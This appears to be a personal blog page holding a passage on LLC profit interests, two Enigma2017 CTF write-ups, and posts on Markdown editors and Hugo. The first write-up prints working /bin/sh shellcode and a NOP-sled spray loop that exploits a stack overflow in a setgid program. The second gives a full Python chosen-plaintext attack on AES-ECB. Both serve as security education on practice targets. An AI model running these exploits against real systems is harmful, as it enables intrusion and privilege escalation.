If Amazon were an LLC, would you rather be granted – today – a 1% profit interest? Or 1% equity? Amazon is infamously unprofitable, but also enormous. And if it were a profit interest, would you rather have that five years ago, or today? Five years ago obviously: even though Amazon is unprofitable, a PIU represents both profit and appreciation of company valuation, which for Amazon is like a 450% increase.

Also, keep in mind that an LLC can always allocate its gross profit in any given year so as to lower (or eliminate) net profit, disbursing the money in (almost) any way that it sees fit. The management team feels like paying all the profits out as bonuses this year? That comes at the expense of the PIU holders. A company car for the CEO? Sorry PIU holders. If you get a great PIU award and it’s fully vested today, but tomorrow the LLC is sold? Sorry, there hasn’t been any growth in the company value over that period, so your PIUs are worth zero.

Anyway, I hope this has been useful. If you disagree or think I am misinformed, I am open to discussions; find me on Twitter. I encourage everyone to educate themselves using multiple sources, and I don’t claim to be an authority on this subject. In fact, here’s a disclaimer.

Disclaimer

*This blog post and all associated comments and discussion do not constitute legal or tax advice in any respect. The author has prepared this material for informational purposes only, and it is not intended to provide, and should not be relied on for, tax, legal or accounting advice. The author is not a licensed practitioner in taxes, law, or accounting. No reader should act or refrain from acting on the basis of any information presented herein without seeking the advice of counsel in the relevant jurisdiction. The author(s) expressly disclaim all liability in respect of any actions taken or not taken based on any contents of this guide or associated content.

12 Feb 2017, 17:52

Enigma2017 CTF Overflowme Writeup

As mentioned in my last post, I spent some time solving security challenges posted on HackCenter for the Enigma2017 conference. This one (obviously) was to exploit a buffer overflow vulnerability. It was meant to be relatively easy, but sometimes you don’t realize the easiest approach first. I’ll walk through not just the solution, but the things I tried that didn’t work. It was a refresher course in exploitation for me – I’ve spent many years on defense research and needed to brush up again. I know that this is a fast walkthrough, but I don’t want to try to teach every concept here, since it is a rather basic exercise, and many others have already explained them elsewhere. If you’re reading and would like clarification, feel free to hit me up on Twitter.

The Challenge

They provided a web shell (literally a terminal emulator in your browser, at HackCenter.com) to a Linux host, and they even gave some free shellcode, \x31\xC0\xF7\xE9\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x68\x2D\x69\x69\x69\x89\xE6\x50\x56\x53\x89\xE1\xB0\x0B\xCD\x80. You can disassemble this several ways, but a fast and easy way is someone else’s server running Capstone.js. We observe that it is an execve syscall at the end, and apparently is running /bin/sh to provide a shell. We already have a shell, so there must be something different about this target process they want us to exploit.

    31 C0   xor eax, eax                # eax = NULL
    F7 E9   imul ecx
    50      push eax                    # the NULL that terminates the string
    68 2F 2F 73 68  push 0x68732f2f     # not a pointer! The string: “h//sh”
    68 2F 62 69 6E  push 0x6e69622f     # not a pointer! The string: “h/bin”
    89 E3   mov ebx, esp
    50      push eax                    # the NULL that terminates the string
    68 2D 69 69 69  push 0x6969692d     # the string “h-iii”
    89 E6   mov esi, esp
    50      push eax                    # arguments
    56      push esi                    #	  to
    53      push ebx                    #		execve()
    89 E1   mov ecx, esp
    B0 0B   mov al, 0xb                 # the code number for execve()
    CD 80   int 0x80                    # syscall()

Now let’s take a look at the shell we are given:

$ uname -a
Linux enigma2017 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1 (2016-12-30) x86_64 GNU/Linux
$ pwd
/problems/9ae8cc98f274aa6de77715eb9bdea7ed
$ ls -la
total 24                     
drwxr-xr-x  2 root       root         4096 Jan 27 16:07 .
drwxr-x--x 89 root       root         4096 Jan 27 16:07 ..
-r--r-----  1 hacksports overflowme_0   33 Jan 31 18:57 key
-rwxr-sr-x  1 hacksports overflowme_0 6088 Jan 31 18:57 overflowme
-rw-rw-r--  1 hacksports hacksports    530 Jan 31 18:57 overflowme.c
$ id
uid=1883(myname) gid=1884(myname) groups=1884(myname),1001(competitors)
$ checksec --file overflowme
# ...weirdly, checksec never returns, a bug in HackCenter maybe...
$ cat /proc/sys/kernel/randomize_va_space
2

Notice the permissions for the overflowme binary include the setgid (SGID) bit. When you run this binary, it runs with the effective group overflowme_0, which is able to read key. The goal here is to run arbitrary code in this process and use it to read key. The given shellcode, executed by overflowme, would provide us a shell where we have the ability to read key.

Notice also the last command, which reads out the ASLR setting: 2. That means we should expect the OS to randomize the layout of the program’s memory when it runs (a value of 2 means full randomization – the stack, shared library mappings, and the heap).

What about the source code they’re letting us see?

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "inspection.h"

void vuln(char *str) {
    char buf[979];
    sprintf(buf, "Hello %s", str);
    puts(buf);
    fflush(stdout);
    return;
}

void be_nice_to_people(){
    gid_t gid = getegid();
    setresgid(gid, gid, gid);
}

int main(int argc, char **argv) {

    if (argc != 2) {
        printf("Usage: %s [name]\n", argv[0]);
        return 1;
    }

    be_nice_to_people();
    vuln(argv[1]);
    return 0;
}

The Vulnerability

This is a stack-based buffer overflow in the sprintf() call. A fixed-length buffer, buf[979] takes a user input of unchecked (and unlimited) length, in the program’s first command-line argument. Since buf is on the stack (as it is a local variable to the function vuln), this is a stack-based buffer overflow.

There are many, many guides out there that explain what happens when you overflow a stack-based buffer on a program that was compiled with absolutely no exploit mitigations: your input overwrites the saved return pointer (also on the stack), and the function epilogue’s RET instruction transfers code execution to the address that is now part of the overflowed input. So, the attacker decides where execution will go: arbitrary code execution.

Proof of the vulnerability:

$ ./overflowme `perl -e 'print "\x30"x982'`

or if you prefer Python:

$ ./overflowme `python -c 'print "\x30"*982'`

The Exploitation

Successful exploitation in a real-world scenario would require multiple prerequisite steps, but this is a simplified exploitation case. We just need to solve a few things.

  1. Determine the offset in the attack input at which it overwrites the stored return pointer. These bytes have to point to where execution should go.
  2. In order to complete step 1, determine the address where execution should go.

Let’s start with the 2nd thing. Check the process memory map by launching it under GDB and using ProcFS:

(gdb) start
(gdb) shell ps
# ... observe the PID of overflowme, it is 32687
(gdb) shell cat /proc/32687/maps
08048000-08049000 r-xp 00000000 ca:02 2490631     /problems/9ae8cc98f274aa6de77715eb9bdea7ed/overflowme
08049000-0804a000 rwxp 00000000 ca:02 2490631     /problems/9ae8cc98f274aa6de77715eb9bdea7ed/overflowme
f7570000-f7571000 rwxp 00000000 00:00 0
f7571000-f7718000 r-xp 00000000 ca:02 786437      /lib32/libc-2.19.so
f7718000-f771a000 r-xp 001a7000 ca:02 786437      /lib32/libc-2.19.so
f771a000-f771b000 rwxp 001a9000 ca:02 786437      /lib32/libc-2.19.so
f771b000-f771f000 rwxp 00000000 00:00 0
f772a000-f772b000 rwxp 00000000 00:00 0
f772b000-f772c000 r-xp 00000000 00:00 0           [vdso]
f772c000-f772e000 r--p 00000000 00:00 0           [vvar]
f772e000-f774e000 r-xp 00000000 ca:02 786434      /lib32/ld-2.19.so
f774e000-f774f000 r-xp 0001f000 ca:02 786434      /lib32/ld-2.19.so
f774f000-f7750000 rwxp 00020000 ca:02 786434      /lib32/ld-2.19.so
fff84000-fffa5000 rwxp 00000000 00:00 0           [stack]

The last memory range, [stack], is executable. You would not see this these days, but it makes exploitation easier: shellcode in the buffer overflow input itself can run directly where it sits. So we just need to check where the buffer is on the stack, put that address into the buffer, and we’re good to go?

Well hold on. Recall that we saw ASLR was enabled in the OS. Let’s run it another time and see these maps again.

08048000-08049000 r-xp 00000000 ca:02 2490631   /problems/9ae8cc98f274aa6de77715eb9bdea7ed/overflowme           
08049000-0804a000 rwxp 00000000 ca:02 2490631   /problems/9ae8cc98f274aa6de77715eb9bdea7ed/overflowme
f75fd000-f75fe000 rwxp 00000000 00:00 0
f75fe000-f77a5000 r-xp 00000000 ca:02 786437    /lib32/libc-2.19.so
f77a5000-f77a7000 r-xp 001a7000 ca:02 786437    /lib32/libc-2.19.so    
f77a7000-f77a8000 rwxp 001a9000 ca:02 786437    /lib32/libc-2.19.so
f77a8000-f77ac000 rwxp 00000000 00:00 0
f77b7000-f77b8000 rwxp 00000000 00:00 0
f77b8000-f77b9000 r-xp 00000000 00:00 0         [vdso]
f77b9000-f77bb000 r--p 00000000 00:00 0         [vvar]
f77bb000-f77db000 r-xp 00000000 ca:02 786434    /lib32/ld-2.19.so
f77db000-f77dc000 r-xp 0001f000 ca:02 786434    /lib32/ld-2.19.so
f77dc000-f77dd000 rwxp 00020000 ca:02 786434    /lib32/ld-2.19.so
ffb9d000-ffbbe000 rwxp 00000000 00:00 0         [stack]  

See that the stack is at a different address. The OS has applied ASLR to the data segments and the shared libraries for libc and ld. However, the entirety of the program binary itself has not moved. That is, apparently overflowme was not even compiled with support for ASLR. Cool!

Our shellcode is on the stack though, and the stack is one of the parts of memory that is moving around on every run. But that’s what we need a pointer to! Our only hope, then, is to find an instruction somewhere in the static mappings that jumps execution back to the stack. Note: here is where I tried a number of unnecessary and fruitless solutions, thinking about this like a modern exploit developer (ROP gadgets, trampolines, etc.). If you just want to read the solution, skip to the next section where I “Phone a Friend.”

My goal was to find an “instruction gadget” within the static mapping that would effectively work as a JMP ESP or CALL ESP. Using hexdump -C | grep FF I looked for FF E4 or FF D4 sequences. This is an extremely crude way to do this, but keep in mind the binary is very small. Unfortunately, because it’s so small, there was also no occurrence of either byte sequence.

If any of the general-purpose registers at the time of the function return happen to also hold pointers to the stack range, then we could trampoline through a JMP EAX/EBX/ECX/EDX or CALL EAX/EBX/ECX/EDX, etc. So I also looked for any of these sequences. I found an FF D0 (call EAX), and a FF D2 (call EDX)! Good, but do we control either of those registers? Check: (gdb) info registers:

eax            0x0      0                         
ebx            0xffa5d5a0       -5909088
ecx            0xf7726878       -143497096
edx            0x0      0
…
esp            0xffa5d56c       0xffa5d56c
ebp            0xffa5d588       0xffa5d588 

annnnd no, they’re both 0x0 by the time the attacker gets control of EIP. But what’s this, EBX points into the stack (verified by another look at the /proc/PID/maps):

ffa3e000-ffa5f000 rwxp 00000000 00:00 0		[stack]  

But alas, poring over the hexdump of the static mappings in memory, there are no CALL EBX (FF D3) or JMP EBX (FF E3) gadgets! There’s not even something more indirect, like a PUSH EBX; RET (53 C3).

Another idea was to try to jump to one of the GOT entries, but this is a tiny little toy binary! It doesn’t import anything useful, as we see with objdump -T:

DYNAMIC SYMBOL TABLE:                                                          
00000000      DF *UND*  00000000  GLIBC_2.0   printf                           
00000000      DF *UND*  00000000  GLIBC_2.0   fflush                           
00000000      DF *UND*  00000000  GLIBC_2.0   getegid                          
00000000      DF *UND*  00000000  GLIBC_2.0   puts                             
00000000  w   D  *UND*  00000000              __gmon_start__                   
00000000      DF *UND*  00000000  GLIBC_2.0   __libc_start_main                
00000000      DF *UND*  00000000  GLIBC_2.0   sprintf                          
00000000      DF *UND*  00000000  GLIBC_2.0   setresgid                        
08049a40 g    DO .bss   00000004  GLIBC_2.0   stdout                           
0804872c g    DO .rodata        00000004  Base        _IO_stdin_used 

If there was a system() in here or something it would be a different story maybe, but as is, there are no useful standard library calls in this table.

The ROP approach to this has failed me.

Phoning a Friend

At this point I called a smart friend of mine for a tip on how to jump the instruction pointer to this stupid shellcode on the stack. We discussed more advanced gadget-finding using Z3 solvers and all sorts of stuff, but ultimately the hints that stuck with me were:

  • Duh, you can stack spray like it’s 1992: just make your input 100KB, NOP-sled to the end where shellcode lies, and re-run the exploit until it works by chance (until the input happens to inhabit a range around the address we choose to put in the overflowed return pointer).
  • You can store an arbitrary amount of NOP-sled in an environment variable and it will all get located in the stack segment.

Making It Work

Okay, so I have a good idea of how to (messily and probabilistically) get a successful exploit. The only thing I skipped over earlier was determining exactly how many bytes offset into the attack input we need to place the pointer. The way you do this is to use an exploit pattern string, such as you can generate online here or offline using various tools, and then watch the value of EIP when the process crashes under GDB:

$ gdb --args ./overflowme Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
(gdb) b vuln
(gdb) run
(gdb) ni
# etc ...
(gdb) info registers
# I observe that the bytes from the pattern that fill EIP (little endian, remember) are "g8Bg".

I chose a pointer that was in the middlish-range for the stack: 0xff881111, converted it into little-endian order, and put it into the attack string at the same location. We can confirm:

$ gdb --args ./overflowme $(python -c 'print "A"*985 + "\x11\x11\x88\xff"')
(gdb) b vuln
(gdb) run
(gdb) ni
# etc ...
(gdb) info registers
# I observe that EIP is 0xff881111. Maybe it doesn't point into the stack on THIS run but it sometimes will, which is all we need, since we're allowed to retry the attack until it does.

Putting it all together:

# Store a NOP sled of 0x90 bytes and the shellcode at the end, in the stack via an env. var.:
$ export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xC0\xF7\xE9\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x68\x2D\x69\x69\x69\x89\xE6\x50\x56\x53\x89\xE1\xB0\x0B\xCD\x80"')

# Point to the stack, and keep running the attack until it works: the ol' "spray & pray"
$ for i in {1..100}; do ./overflowme $(python -c 'print "A"*985 + "\x11\x11\x88\xff"'); done

# Boom, it pops a shell:
$ ls
key  overflowme  overflowme.c                                                  
$ cat key
bb379544581fa2b010d958d6e78addfa

12 Feb 2017, 13:40

Enigma2017 CTF Broken Encryption Writeup

There is a new “Jeopardy style” security CTF web framework (CTF-as-a-Service?) called HackCenter that just debuted from For All Secure, the CMU-affiliated security startup known for winning last year’s DARPA Cyber Grand Challenge Final Event with their game-playing “automated exploit generation” system they called Mayhem CRS. HackCenter is their “other” technology, I guess, and right now the only CTF they’ve hosted is/was the one that occurred at Enigma2017 USENIX conference at the end of January. It seemed to be marketed as educational: “learn to hack!” and not as unfriendly and elitist as some of the more competitive CTFs, so I gave it a look. Also, this was a chance to refresh myself on some Python.

The Challenge

They give us a telnet server that prompts us to send whatever string we want, and then it sends back an encrypted version of that string. Also they give us this source code for the server:

#!/usr/bin/python -u
from Crypto.Cipher import AES

flag = open("flag", "r").read().strip()
key = open('enc_key', 'r').read().strip().decode('hex')

welcome = """
************ MI6 Secure Encryption Service ************
                  [We're super secure]
       ________   ________    _________  ____________;_
      - ______ \ - ______ \ / _____   //.  .  ._______/ 
     / /     / // /     / //_/     / // ___   /
    / /     / // /     / /       .-'//_/|_/,-'
   / /     / // /     / /     .-'.-'
  / /     / // /     / /     / /
 / /     / // /     / /     / /
/ /_____/ // /_____/ /     / /
\________- \________-     /_/

"""

def pad(m):
  m = m + '1'
  while len(m) % 16 != 0:
    m = m + '0'
  return m

def encrypt():
  cipher = AES.new(key,AES.MODE_ECB)

  m = raw_input("Agent number: ")
  m = "agent " + m + " wants to see " + flag

  return cipher.encrypt(pad(m)).encode("hex")

print welcome
print encrypt()

We also get a web shell on hackcenter.com: literally an in-browser terminal emulator connected to the remote server (we do not have read access to the directory with “flag”), but for this problem we will just open our local Terminal app and poke around.

Anything ECB is Bad Mmmkay

Look at the source: basically, "agent " + yourinput + " wants to see " + flag is padded out to the next nearest AES block length (128 bits == 16 bytes) and then encrypted with AES-ECB using whatever the key is. Now, basically the first thing you learn about block ciphers is to never use the Electronic Code Book (ECB) mode. You’ll see a photo of Tux the Linux mascot encrypted with AES-ECB and how you can still see the edges of the image in the encrypted version. But that’s about it. It’s rare to see an explanation of why this is relevant or how to break it. Just, “everyone knows it’s bad.”

The reason why ECB mode of any block cipher is bad is that the same input always encrypts to the same output. The input is broken into fixed-length blocks and encrypted, and identical plaintext blocks produce identical ciphertext blocks. The data is all encrypted, but we can see where the plaintexts were the same. There is no key recovery attack against this issue, at least not that I am aware of, but the problem is that the plaintext can be guessed. There are two basic attacks against ECB:

  1. Given enough encrypted blocks and some partial knowledge of the plaintext (known offsets of fixed data, like as defined by filetype formats or communication protocols), statistical and frequency analysis (and some guessing, then confirming) can reveal partial plaintext.
  2. Given the ability to prefix or circumfix (that means insert in the middle somewhere) arbitrary plaintext, and then have it encrypted and view the resulting ciphertext, an attacker can stage what cryptographers call a Chosen Plaintext Attack (CPA). The scenario of passing arbitrary plaintext to a remote encryptor and receiving the ciphertext back is also called an Oracle. This is the attack we will discuss in this post.

The reason why this is relevant is that to the average programmer who can’t be bothered, ECB looks like a valid mode choice for AES, a cipher that people generally recommend: “military grade crypto,” right? They might use it to encrypt the cookie their web site stores in your browser. Or if they’re especially ignorant in security like the people who work at Adobe, they might use it to encrypt their users’ passwords on the server.

Breaking ECB with the Chosen Plaintext Attack

Being able to circumfix our arbitrary input into the plaintext (at a known location in that string) means that we can choose an input such that our known substring aligns fully on an AES block boundary, allowing us to test what the ciphertext is for any arbitrary block that we choose.

"agent " + yourinput + " wants to see " + flag + padding
(6 chars)  (n chars)    (14 chars)   <—- if you want to test-encrypt a single block of arbitrary input, put your test input on a 16-byte block boundary, like so: yourinput = "01234567891000000000000000". "1000000000000000" falls at bytes 16 through 31 of the overall message, aka the second AES (128-bit, 16-byte) block.

We don’t know how long the flag is, but we know how the padding is applied: if the plaintext message does not end on a 16-byte boundary, then it is extended by a single “1” and up to 14 “0” characters. If the plaintext message does end on a 16-byte boundary, then it is extended by a full block of padding: 1000000000000000. This may seem counter-intuitive, but there always has to be padding in a block cipher, even when the message length already is a multiple of the block length: otherwise how would you know if the last block is padding or if 1000000000000000 was part of the message?

See where we’re going with this? We will give the above plaintext, and observe the output’s 2nd block. That is the exact same output we would expect to see as the last block of ciphertext if the flag ends at a block boundary and the final block were AES padding.

Agent number: 01234567891000000000000000
ceaa6fa24a71971f21413c1ea39f4e7c53b1c1d36d11a2c20dfc3913bb299f11c9777890922460e74fefb1a94f5c95df0ebb6d7bc5a7922f0857283feb2b068dc5148be36b7670e2ca4fe52c3f65c37612b88acbe4bbd5a9f2588bbc4e0ea92453b1c1d36d11a2c20dfc3913bb299f11

Note the second block (32 hex characters = 16 bytes) of ciphertext is 53b1c1d36d11a2c20dfc3913bb299f11 and, through a stroke of luck, we’ve already aligned the overall message on a block boundary too, as we see 53b1c1d36d11a2c20dfc3913bb299f11 is also the last block of ciphertext!

The game now is to insert one additional byte of arbitrary text in order to push a single byte of the “flag” portion of the string rightward into the padding block. The final padding block will be n100000000000000 where n is the unknown byte of flag.

What will we do then to guess that byte? We’ll brute-force it: send new plaintext messages for all 255 possibilities of n in our block-aligned arbitrary input (which is the 2nd block). When the ciphertext’s 2nd block matches the ciphertext’s 7th block, then we know we guessed correctly. Then we’ll insert one additional byte again at the same location, and repeat this process. In other words, we expect to send a series of messages like the following:

0123456789a100000000000000
0123456789b100000000000000
0123456789c100000000000000
0123456789d100000000000000
0123456789e100000000000000 ... let's say that ciphertext blocks 2 and 7 match at this point!
0123456789ae10000000000000
0123456789be10000000000000
0123456789ce10000000000000
0123456789de10000000000000
0123456789ee10000000000000
0123456789fe10000000000000 ... they match again. We so far know last block = fe10000000000000
0123456789afe1000000000000
0123456789bfe1000000000000
and so on, and so on... up to 255 guesses per byte and as many bytes as we need to discover

In practical terms, we can try guessing only in the ASCII range of 0x20-0x7E or so, since we expect the secret in this case to be plaintext (the “flag”). This will speed things up by more than double.

Putting it All Together: A Solution in Python

Knowing what to do is half the battle. The other half is coding it up and tearing your hair out over data alignment issues and dynamic typing issues.

#!/usr/bin/python

# Enigma2017 CTF, "Broken Encryption"

import sys
import time       # for using a delay in network connections
import telnetlib  # don't try using raw sockets, you'll tear your hair out trying to send the right line feed character

__author__ = 'michael-myers'

# TODO: I'm interested in any more elegant way to block-slice a Python string like this.
# Split out every 16-byte (32-hex char) block of returned ciphertext:
def parse_challenge(challenge):
    ciphertext_blocks = [challenge[0:32], challenge[32:64], challenge[64:96],
                         challenge[96:128], challenge[128:160], challenge[160:192],
                         challenge[192:224], challenge[224:]]
    return ciphertext_blocks


# To attack AES-ECB, we will be exploiting the following facts:
#   * we do not know all of the plaintext but we control a substring of it.
#	* the controlled portion is at a known offset within the string.
#   * by varying our input length we can force the secret part onto a block boundary.
#   * we can choose our substring to be a full block of padding & align it at a boundary.
#   * if the message ends at a block boundary, the last 16-byte block will be all padding.
#   * thus we know when the secret part is block aligned; we'll see the same ciphertext.
#   * there is no nonce or IV or counter, so ciphertext is deterministic.
#   * by varying length of plaintext we can align the secret part such that there 
#		is only one unknown byte at a time being encrypted in the final block of output. 
#	* by varying one byte at a time, we can brute-force guess input blocks until we
#       match what we see in the final block, thus giving us one byte of the secret.
#   * we will limit our guesses to the ASCII range 0x20-0x7E for this particular challenge.
#
# Begin by changing the 2nd block of plaintext to n100000000000000, where n is a guess. 
# If the ciphertext[2nd block] == ciphertext[7th block] then the guess is correct,
# otherwise increment n.
def main():
    # If the Enigma2017 servers are still up: enigma2017.hackcenter.com 7945
    if len(sys.argv) < 3:   # lol Python doesn't have an argc
        print 'Usage : python CTF-Challenge-Response.py hostname port'
        sys.exit()
    host = sys.argv[1]
    port = int(sys.argv[2])
    
    guessed_secret = ""

    # Our input pads to the end of the 1st block, then aligns a guess at block 2.
    # Because we need to constantly alter this value, we are making it a bytearray. 
    # Strings in Python are immutable and inappropriate to use for holding data.
    chosen_plaintext = bytearray("0123456789" + "1000000000000000")

    # Guess each byte of the secret, in succession, by manipulating the 2nd plaintext
    # block (bytes 10 through 26) and looking for a matched ciphertext in the final block:
    for secret_bytes_to_guess in range(0, 64):
        # Add in a new guessing byte at the appropriate position:
        chosen_plaintext.insert(10, "?")

        # Guess over and over different values until we get this byte:
        for guessed_byte in range(0x20, 0x7E):  # this is the printable ASCII range.
            chosen_plaintext[10] = chr(guessed_byte)

            tn = telnetlib.Telnet(host, port)
            tn.read_until("Agent number: ")

            # Telnet input MUST BE DELIVERED with a \r\n line ending. If you send
            # only the \n the remote end will silently error on your input and send back
            # partially incorrect ciphertext! Untold hours debugging that bullshit.
            # Here we carefully convert the bytearray to ASCII and then to a string type, 
            # or else telnetlib barfs because of the hell that is dynamic typing.
            send_string = str(chosen_plaintext.decode('ascii') + "\r\n")
            tn.write(send_string)

            challenge = tn.read_all()
            tn.close()
            # time.sleep(0.5)   # (optional) rate-limit if you're worried about getting banned.

            ciphertext_blocks = parse_challenge(challenge)
            print "Currently guessing: " + chosen_plaintext[10:26]  # 2nd block holds the guess
            print "Chosen vs. final ciphertext blocks: " + ciphertext_blocks[1] + " <- ? -> " + ciphertext_blocks[6]

            # We're always guessing in the 2nd block and comparing result vs the 7th block:
            if ciphertext_blocks[1] == ciphertext_blocks[6]:
                print "Guessed a byte of the secret: " + chr(guessed_byte)
                guessed_secret = chr(guessed_byte) + guessed_secret
                break   # Finish the inner loop immediately, back up to the outer loop.

    print "All guessed bytes: " + guessed_secret

    print("Done")


if __name__ == "__main__":
    main()

And, after all of this, we uncover the flag: 54368eae12f64b2451cc234b0f327c7e_ECB_is_the_w0rst

05 Feb 2017, 03:05

The markup language known as Markdown

What it Is

Markdown is a lightweight markup language (as opposed to a heavyweight one like HTML or LaTeX). If you’ve ever taken plain-text file notes and used an asterisk to represent a bullet point, or a line of dashes like an underline for a heading, then you’ve basically already written Markdown. Markdown is a natural-looking “syntax” that lets you turn text like this:

## What it is
[Markdown](https://en.wikipedia.org/wiki/Markdown) is a *lightweight markup language* (as opposed to a **heavyweight** one like HTML or LaTeX).

into the HTML+CSS page that you’re looking at right now. You know that annoying nerd who refuses to send HTML-formatted email and insists on sending plain text peppered with slashes and asterisks instead of italics and bold? Yeah, basically a guy like that turned the habit into a semi-official standard, and now instead of being imaginary italics and bold, it actually renders that way.

Why Not Just Write in HTML Directly?

I think this is best explained by Brett Terpstra here. Basically, HTML sucks to work in if you’re just trying to write some content: it is tedious, hard on the eyes, and error prone. If you want the site to look good at all, it also needs CSS, which sucks even worse. Real people don’t want to work in either one; they just want to write prose and have it look good. For this, you can use Markdown as a standard format for your thoughts, and then let a static site generator (like Hugo) turn it into a web page. Be a writer, not a website developer, is the thinking.

Editors

I went looking for the ideal text editor in which to edit Markdown files. Ideally I could find something that ran on both MacOS and Linux, just for consistency since I use both. But Markdown is a standard format so I would also settle for the best on each respective platform, even if I had to use two different editors.

If there is one thing that gets reinvented more often than anything else, it’s text editors. Programmers love to re-solve their own nerd problems rather than tackle real-world problems, and one problem every programmer has is editing text. So there are about 500 text editors to choose from at this point, but I narrowed the field to these 7 on the basis of how well they handle Markdown.

[Image: MarkdownEditors]

If the job is programming, a text editor should have code-completion and syntax highlighting. But if the job is editing a markup language, WYSIWYG is the number one thing I care about. So you notice I am not even considering the Vims and Emacs of the world. The whole point of Markdown was to be easy: easy for a human to read in its raw state, easy to edit. But I guess I would take this sentiment a little bit further: why should I have to look at markup language at all? It’s 2017, shouldn’t I have an editor at least as good as WordPad from Windows 95? Of course, I want it to be able to flip back to the raw “source” markup when necessary, but most of the time I just want to edit it the way it’s going to look when I’m done.

This is a surprisingly uncommon feature. It seems that most editors have adopted the two-view or split-window paradigm seen in editors for more complicated markup and typesetting languages like LaTeX. They present the raw Markdown source on the left, and the rendered version on the right. Booooo. The concept of Auto-save, on the other hand, is a ubiquitous feature nowadays. That’s great to see.

|                       | TextNut  | Typora    | HarooPad | Quiver   | Atom | Sublime Text | Texts    |
|-----------------------|----------|-----------|----------|----------|------|--------------|----------|
| WYSIWYG               | Yes      | Yes       | No       | No       | No   | No           | Yes      |
| Easy to Use           | Yes      | Yes       | Yes      | Yes      | No   | No           | Yes      |
| Both Mac & Linux      | No       | Yes       | Yes      | No       | Yes  | Yes          | No       |
| Free / OSS            | No ($25) | No (Beta) | Yes      | No ($10) | Yes  | No ($70)     | No ($20) |
| Auto-save             | Yes      | Yes       | Yes      | Yes      | Yes  | Yes          | Yes      |
| Work Directly in .md  | No*      | Yes       | Yes      | No*      | Yes  | Yes          | Yes      |
| Leaves TOML Intact    | Yes      | Yes       | Yes      | Unknown  | Yes  | Yes          | No       |

* = TextNut can open and edit a .md file, but the WYSIWYG aspect only works when the file is “imported” into the proprietary format, edited there, and then exported back to Markdown. Quiver has a similar focus on notes and a similar weakness in working with .md directly; it’s basically a less capable TextNut.

I like Texts, but it breaks the “front matter” on a Hugo post, so that’s a deal-breaker. HarooPad, despite its lack of English documentation and the fact that development has been dead for a couple of years, is pretty robust. If only it offered WYSIWYG editing, I think it would have been my choice.

So the overall winner for me is Typora. Eventually it will leave beta, and they’ll charge for it, but hopefully it’s something reasonable. Until then, it’s free!

QuickLook for .md Files (MacOS)

I am all about using QuickLook in MacOS. You just hit space bar on a file in Finder and you get a perfectly good read-only peek at the file. But it doesn’t handle Markdown (as plain text, let alone as a rendered view). Fortunately someone made a QuickLook generator you can install using Homebrew: brew install Caskroom/cask/qlmarkdown.

Now you’re ready to work with Markdown files!

It’s Not All Roses Though: Behind the Scenes on This Post

The rendering of your content doesn’t always turn out the way you envisioned. When this happens, either your Hugo theme or the Markdown renderer is to blame. Unfortunately, this might mean rolling up your sleeves and fixing CSS, as I had to do to get the table above to look decent. Hopefully this is a one-time thing. I had to go into the purehugo theme subdirectory and edit static/all.min.css.

Secondly, when editing Markdown to embed an image from a local directory (as I’ve done above), Hugo requires you to put the file under /static, and then in the Markdown you reference it with a relative path that has no leading slash, such as ![MarkdownEditors](img/markdownEditors.png) (the actual path of the image in the source tree is /blog/static/img/markdownEditors.png); Hugo copies it into the publishdir during rendering. Because of this, you can’t actually see the image in your Markdown editor, which sucks, and your source tree ends up with two copies of the file, which also sucks.
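To make that concrete, here is roughly how it lays out for the image above (a sketch based on my own setup, where the site lives in a blog/ directory and publishes to blog/docs/):

blog/static/img/markdownEditors.png          <- where the file sits in the source tree
blog/docs/img/markdownEditors.png            <- where Hugo copies it during rendering
![MarkdownEditors](img/markdownEditors.png)  <- how the post references it (no leading slash)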

03 Feb 2017, 19:07

Hugo, the static site generator

Hugo, a Static Site Generator

In my last post, I covered the rationale behind using a static site generator. Static site generators are not just for creating blogs. They can also be used to create online resumes, company sites, online documentation, etc.

